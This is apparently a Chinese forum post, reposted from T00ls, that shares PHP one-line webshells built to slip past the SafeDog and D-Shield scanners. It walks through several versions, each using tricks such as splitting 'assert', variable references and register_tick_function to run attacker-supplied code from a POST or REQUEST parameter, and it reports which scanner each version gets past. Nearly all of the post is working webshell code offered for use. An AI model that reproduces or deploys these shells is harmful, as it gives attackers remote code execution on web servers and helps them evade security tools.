php一句话木马的老生常谈,可过D盾,安全狗

首发T00ls,原文地址https://www.t00ls.net/thread-45367-1-1.html

这边也是才进t00ls,算是一个小小的分享吧。
首先是过安全狗,这里讲下怎么一步步过安全狗。
首先下面这个马很简单,只用了一个变量覆盖,所以,不出所料被杀了
        $b=$_POST['x'];
        $a='b';
        @assert($$a);
 
马被杀了那肯定要想办法免杀,我们试试把assert分开呢?
        $b=$_POST['x'];
        $a='b';
        $c=’a’.’s’.’s’.’e’.’r’.’t’;
        @$c($$a);
 
还是不行,,那我再想想其他办法,引用下?换个思路呀?
        $a='b';
        $b=&$d;
        $c='a'.'s'.'s'.'e'.'r'.'t';
        $d=$_POST['x'];
        $c($$a);
 
可以了,,这边可以看到,其实安全狗多绕绕,他就晕掉了。不过这个D盾还是会报警。
下面就分享一个D盾不报警的吧。

$a=array("assert"=>"XC90");
$b=array_keys($a,'XC90');
declare(ticks=1);
register_tick_function($b[0], $_REQUEST['x']);
?>
 

你可能感兴趣的:(渗透测试)